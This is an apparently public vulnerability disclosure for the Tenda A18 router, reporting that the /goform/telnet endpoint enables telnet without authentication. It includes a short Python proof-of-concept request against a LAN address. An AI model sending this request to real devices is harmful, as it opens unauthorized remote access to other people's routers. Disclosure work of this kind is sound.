Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Tenda A18 V15.13.07.09 Unauthorized opening of tenlet service

Firmware information

Affected version

Vulnerability details

In /goform/telnet, the tenlet service can be started without authorization

Poc

import requests

url = "http://192.168.10.104/goform/telnet"

r = requests.post(url)

print(r.content)

You can see that the tenlet service is enabled